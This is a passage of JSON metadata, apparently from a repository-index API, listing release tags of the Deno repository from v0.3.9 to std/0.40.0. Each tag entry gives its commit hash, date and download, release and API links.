1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden